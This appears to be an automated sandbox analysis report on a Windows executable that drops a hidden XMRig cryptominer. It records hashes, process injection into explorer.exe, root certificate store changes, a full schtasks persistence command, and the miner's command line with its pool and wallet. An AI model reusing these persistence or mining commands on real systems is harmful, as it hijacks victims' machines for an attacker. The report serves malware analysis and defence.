Analysis
-
max time kernel
134s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
13-03-2024 03:36
Static task
static1
Behavioral task
behavioral1
Sample
c4dfc3e37ff44d6794f8fe89e464a90d.exe
Resource
win7-20240221-en
General
-
Target
c4dfc3e37ff44d6794f8fe89e464a90d.exe
-
Size
42KB
-
MD5
c4dfc3e37ff44d6794f8fe89e464a90d
-
SHA1
c1875a4ba364e9d74fccc96623b974618e3f5e44
-
SHA256
75e4dab693b826d6462a1d7251ad1eebe13aea193f68608ba0547607b19bc9fc
-
SHA512
7f49ec7136487c2b6242fddd0fdbd9a74353185e63784fc94d48772963ec71b74f3c13dfa003f7a35ffe864e5c0977c7dd0fea01d6eb9f3a62c747506d5d1917
-
SSDEEP
768:hFQx6YyMKQKEOuiQYvzusuCJrJw68b0soqv38mGL4VhmdSYLMt:8xTv7/gusfF8osoesmGLQhpxt
Malware Config
Signatures
-
XMRig Miner payload 19 IoCs
resource yara_rule behavioral1/memory/1496-64-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-65-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-66-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-67-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-68-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-69-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-70-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-71-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-72-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-75-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-78-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-80-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-81-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-83-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-82-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-84-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-86-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/1496-89-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 2592 services64.exe 2476 sihost64.exe -
Loads dropped DLL 2 IoCs
pid Process 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 2592 services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 raw.githubusercontent.com 9 raw.githubusercontent.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2592 set thread context of 1496 2592 services64.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2560 schtasks.exe 2364 schtasks.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 services64.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 2592 services64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe Token: SeDebugPrivilege 2592 services64.exe Token: SeLockMemoryPrivilege 1496 explorer.exe Token: SeLockMemoryPrivilege 1496 explorer.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 2184 wrote to memory of 2968 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 28 PID 2184 wrote to memory of 2968 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 28 PID 2184 wrote to memory of 2968 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 28 PID 2968 wrote to memory of 2560 2968 cmd.exe 30 PID 2968 wrote to memory of 2560 2968 cmd.exe 30 PID 2968 wrote to memory of 2560 2968 cmd.exe 30 PID 2184 wrote to memory of 2592 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 31 PID 2184 wrote to memory of 2592 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 31 PID 2184 wrote to memory of 2592 2184 c4dfc3e37ff44d6794f8fe89e464a90d.exe 31 PID 2592 wrote to memory of 2740 2592 services64.exe 32 PID 2592 wrote to memory of 2740 2592 services64.exe 32 PID 2592 wrote to memory of 2740 2592 services64.exe 32 PID 2740 wrote to memory of 2364 2740 cmd.exe 35 PID 2740 wrote to memory of 2364 2740 cmd.exe 35 PID 2740 wrote to memory of 2364 2740 cmd.exe 35 PID 2592 wrote to memory of 2476 2592 services64.exe 34 PID 2592 wrote to memory of 2476 2592 services64.exe 34 PID 2592 wrote to memory of 2476 2592 services64.exe 34 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 PID 2592 wrote to memory of 1496 2592 services64.exe 39 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c4dfc3e37ff44d6794f8fe89e464a90d.exe"C:\Users\Admin\AppData\Local\Temp\c4dfc3e37ff44d6794f8fe89e464a90d.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'3⤵
- Creates scheduled task(s)
PID:2560
-
-
-
C:\Users\Admin\AppData\Local\Temp\services64.exe"C:\Users\Admin\AppData\Local\Temp\services64.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'4⤵
- Creates scheduled task(s)
PID:2364
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
PID:2476
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQmYM88CHfRtRr6KMKy --pass=test --cpu-max-threads-hint=20 --tls3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD5753df6889fd7410a2e9fe333da83a429
SHA13c425f16e8267186061dd48ac1c77c122962456e
SHA256b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA5129d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444
-
Filesize
175KB
MD5dd73cead4b93366cf3465c8cd32e2796
SHA174546226dfe9ceb8184651e920d1dbfb432b314e
SHA256a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63
-
Filesize
42KB
MD5c4dfc3e37ff44d6794f8fe89e464a90d
SHA1c1875a4ba364e9d74fccc96623b974618e3f5e44
SHA25675e4dab693b826d6462a1d7251ad1eebe13aea193f68608ba0547607b19bc9fc
SHA5127f49ec7136487c2b6242fddd0fdbd9a74353185e63784fc94d48772963ec71b74f3c13dfa003f7a35ffe864e5c0977c7dd0fea01d6eb9f3a62c747506d5d1917
-
Filesize
7KB
MD58dc541a5c37afc1fbf747f315b3039f8
SHA142df50fa5f6b16167f50b567baea1d71d0b96605
SHA256a03ea36743a32f47054884f1f4cb5d42212c98a8c0b037404fa3037a0c1c8b91
SHA5126204d8db6e62b9715698e6ec59aa56a928dd763a1fd17b1d191fe24ca564a01cda053f97448fb57b5db346f360c58c0013101eef4852077b9b4249e71964f86c